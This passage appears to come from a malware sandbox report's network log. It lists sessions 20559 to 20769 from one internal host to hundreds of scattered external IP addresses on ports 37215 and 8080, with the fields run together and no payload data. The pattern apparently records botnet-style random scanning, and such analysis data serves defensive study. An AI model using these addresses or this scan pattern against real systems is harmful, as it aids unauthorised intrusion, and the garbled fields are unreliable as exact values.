                                                        20559192.168.2.2336418117.202.63.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20560192.168.2.2343688197.59.113.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20561192.168.2.235853441.138.136.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20562192.168.2.235677041.23.242.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20563192.168.2.2339488157.25.217.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20564192.168.2.235471241.208.117.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20565192.168.2.233908841.22.14.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20566192.168.2.233359641.174.156.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20567192.168.2.2355818130.176.39.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20568192.168.2.234232487.90.27.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20569192.168.2.234895841.237.135.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20570192.168.2.2355904197.179.18.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20571192.168.2.2357980157.24.12.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20572192.168.2.2336100157.201.234.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20573192.168.2.2343216157.205.44.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20574192.168.2.2343982120.183.40.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20575192.168.2.2339588157.208.30.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20576192.168.2.235114641.193.234.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20577192.168.2.2342802197.228.243.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20578192.168.2.235705241.243.13.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20579192.168.2.2336770197.180.63.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20580192.168.2.2347700197.71.55.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20581192.168.2.2355920157.219.113.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20582192.168.2.235440641.78.23.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20583192.168.2.23521225.203.178.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20584192.168.2.233422641.45.213.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20585192.168.2.236051641.145.80.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20586192.168.2.235284641.246.60.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20587192.168.2.2349118157.124.150.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20588192.168.2.2360240197.186.201.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20589192.168.2.2338496157.42.151.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20590192.168.2.2350800157.252.22.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20591192.168.2.2339924197.147.143.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20592192.168.2.234669641.11.2.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20593192.168.2.2350286157.212.158.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20594192.168.2.2359152197.243.221.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20595192.168.2.2346194157.187.240.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20596192.168.2.2337426197.156.96.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20597192.168.2.2359140108.2.201.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20598192.168.2.2340546157.233.249.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20599192.168.2.235349641.173.3.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20600192.168.2.234278241.134.153.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20601192.168.2.2359048157.229.3.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20602192.168.2.2358786157.116.139.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20603192.168.2.2354744126.203.221.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20604192.168.2.2334586197.79.181.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20605192.168.2.2347574157.83.129.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20606192.168.2.2343802197.194.129.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20607192.168.2.2357204138.18.182.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20608192.168.2.2353930171.154.38.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20609192.168.2.2359422202.56.211.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20610192.168.2.234730613.195.180.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20611192.168.2.2344604123.171.162.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20612192.168.2.233580665.128.149.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20613192.168.2.234668272.150.139.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20614192.168.2.2334900140.156.241.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20615192.168.2.233369253.170.93.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20616192.168.2.2360208131.187.212.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20617192.168.2.2356360100.241.78.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20618192.168.2.2345770138.189.145.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20619192.168.2.2335340161.185.165.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20620192.168.2.2344656102.38.165.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20621192.168.2.234185048.104.232.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20622192.168.2.2353724201.132.117.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20623192.168.2.2347538208.191.217.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20624192.168.2.2359166220.204.137.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20625192.168.2.235435224.165.120.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20626192.168.2.235542877.41.54.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20627192.168.2.23474805.239.140.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20628192.168.2.235379063.140.244.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20629192.168.2.2334726144.109.236.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20630192.168.2.233558294.29.216.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20631192.168.2.233855478.235.247.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20632192.168.2.2344878110.70.131.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20633192.168.2.2338962138.95.75.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20634192.168.2.2356326117.102.13.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20635192.168.2.2334546150.194.100.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20636192.168.2.2355954144.28.162.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20637192.168.2.2355270110.166.74.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20638192.168.2.2346710177.47.198.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20639192.168.2.2359474174.133.216.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20640192.168.2.235219225.130.172.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20641192.168.2.2333460124.32.163.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20642192.168.2.235541458.79.171.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20643192.168.2.235304086.203.146.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20644192.168.2.234550052.101.44.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20645192.168.2.23499349.95.82.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20646192.168.2.235165296.210.67.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20647192.168.2.2358872126.116.146.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20648192.168.2.23440785.252.73.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20649192.168.2.234353845.146.97.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20650192.168.2.2345128185.233.217.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20651192.168.2.2345584184.197.241.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20652192.168.2.2344520143.13.112.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20653192.168.2.234249287.181.145.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20654192.168.2.2353198123.4.114.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20655192.168.2.235094058.147.247.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20656192.168.2.234148296.214.197.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20657192.168.2.2343056107.17.39.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20658192.168.2.2350920165.40.194.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20659192.168.2.233808094.255.50.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20660192.168.2.234350682.106.246.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20661192.168.2.2337082183.128.18.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20662192.168.2.2351198194.116.72.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20663192.168.2.2360304174.101.218.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20664192.168.2.2348308193.114.23.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20665192.168.2.234774014.195.255.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20666192.168.2.233376845.80.212.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20667192.168.2.2352016199.17.196.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20668192.168.2.233808050.118.161.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20669192.168.2.2358524163.217.204.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20670192.168.2.2342302146.113.168.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20671192.168.2.2344818118.2.185.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20672192.168.2.2348132218.213.155.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20673192.168.2.235819461.203.28.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20674192.168.2.235550844.102.128.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20675192.168.2.2343750180.7.245.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20676192.168.2.2343482190.58.209.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20677192.168.2.235244224.120.243.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20678192.168.2.2336832121.208.106.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20679192.168.2.2357416175.80.33.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20680192.168.2.2351032157.61.31.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20681192.168.2.2341814153.194.102.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20682192.168.2.2359468203.109.226.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20683192.168.2.233907235.108.27.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20684192.168.2.235742050.210.22.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20685192.168.2.2343058119.134.15.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20686192.168.2.23472582.20.11.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20687192.168.2.2341968145.42.49.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20688192.168.2.233916441.133.136.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20689192.168.2.2352168210.98.6.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20690192.168.2.2345250174.22.9.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20691192.168.2.234588647.105.36.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20692192.168.2.235073453.145.218.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20693192.168.2.2360590126.44.241.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20694192.168.2.234554417.142.140.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20695192.168.2.2339440106.60.68.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20696192.168.2.2346688109.251.202.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20697192.168.2.2342520109.115.38.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20698192.168.2.234670474.86.216.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20699192.168.2.2357972183.21.177.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20700192.168.2.2356608174.108.207.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20701192.168.2.2348822184.136.170.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20702192.168.2.233477272.227.66.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20703192.168.2.235553891.238.169.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20704192.168.2.234346883.12.241.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20705192.168.2.23417789.34.226.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20706192.168.2.234304635.253.188.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20707192.168.2.2356004157.245.181.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20708192.168.2.2342982166.208.128.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20709192.168.2.2335228112.208.188.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20710192.168.2.233341090.55.183.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20711192.168.2.2357940210.118.56.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20712192.168.2.235986464.27.91.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20713192.168.2.2337730216.132.168.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20714192.168.2.2355016108.133.229.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20715192.168.2.234881088.194.232.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20716192.168.2.233625663.234.131.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20717192.168.2.23467762.190.116.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20718192.168.2.2336472178.36.50.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20719192.168.2.234269248.26.43.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20720192.168.2.235100679.164.105.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20721192.168.2.2360836121.100.108.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20722192.168.2.234697453.141.15.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20723192.168.2.2352760155.22.213.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20724192.168.2.2341204162.128.238.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20725192.168.2.235237849.121.47.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20726192.168.2.2353850220.68.243.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20727192.168.2.2335082210.21.136.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20728192.168.2.234656618.20.186.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20729192.168.2.2356522155.118.94.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20730192.168.2.235462493.224.99.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20731192.168.2.2353570218.224.31.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20732192.168.2.235080814.138.139.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20733192.168.2.233773219.217.54.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20734192.168.2.2358412206.30.43.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20735192.168.2.2352610108.173.54.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20736192.168.2.2354838130.32.227.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20737192.168.2.234723092.71.226.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20738192.168.2.23490965.47.176.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20739192.168.2.2342696153.81.32.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20740192.168.2.2338834119.122.81.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20741192.168.2.2357922202.6.173.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20742192.168.2.2342718221.152.98.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20743192.168.2.2352784118.83.223.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20744192.168.2.235868687.168.120.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20745192.168.2.234171238.22.234.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20746192.168.2.2353242152.184.191.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20747192.168.2.234060632.213.211.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20748192.168.2.234655267.242.66.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20749192.168.2.2332910186.181.24.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20750192.168.2.235185697.151.237.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20751192.168.2.234934871.41.80.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20752192.168.2.234143661.85.191.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20753192.168.2.233614018.139.7.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20754192.168.2.2351094115.176.55.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20755192.168.2.2343634172.172.250.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20756192.168.2.2347428118.112.2.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20757192.168.2.235440872.91.102.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20758192.168.2.234487435.96.5.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20759192.168.2.233454297.217.217.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20760192.168.2.235576419.226.187.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20761192.168.2.2344670152.137.245.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20762192.168.2.2354764189.93.50.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20763192.168.2.2354042103.84.110.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20764192.168.2.235265260.119.31.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20765192.168.2.23500481.210.160.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20766192.168.2.233532298.77.87.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20767192.168.2.234166059.103.113.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20768192.168.2.233431647.14.70.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20769192.168.2.235555889.99.75.1508080
